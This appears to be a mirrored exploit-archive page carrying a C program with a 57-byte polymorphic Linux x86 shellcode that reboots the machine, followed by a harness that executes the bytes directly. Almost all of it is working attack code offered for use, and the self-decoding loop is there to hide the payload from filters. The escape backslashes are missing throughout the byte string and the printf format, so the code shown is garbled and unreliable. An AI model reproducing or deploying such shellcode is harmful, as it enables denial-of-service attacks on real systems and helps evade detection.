[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : linux/x86 reboot() polymorphic shellcode 57 bytes
# Published : 2009-06-29
# Author : Jonathan Salwan
# Previous Title : win32 xp-sp3 beep and exitprocess shellcode 28 bytes
# Next Title : linux/x86 execve shellcode generator null byte free


/*  
 *  Title :	reboot() polymorphic shellcode - 57 bytes
 *  Os: 	Linux x86
 *
 *  Author: 	Jonathan Salwan - submit AT shell-storm.org
 *  Web: 	http://www.shell-storm.org
 *
 *
 *  !! Database of shellcodes => http://www.shell-storm.org/shellcode/
 *
 */

#include <stdio.h>

char shellcode[] = 	"xebx11x5ex31xc9xb1x30x80"
			"x6cx0exffx01x80xe9x01x75"
  			"xf6xebx05xe8xeaxffxffxff"
			"x32xc1x51x69x63x70x70x75"
			"x69x6fx30x73x66x69x30x74"
			"x63x6ax8axe4x51x8axe3x54"
			"x8axe3x54x8axe2xb1x0cxce"
			"x81";


int main()
{
        fprintf(stdout,"Length: %dn",strlen(shellcode));
        (*(void(*)()) shellcode)();

return 0;
}

// www.Syue.com [2009-06-29]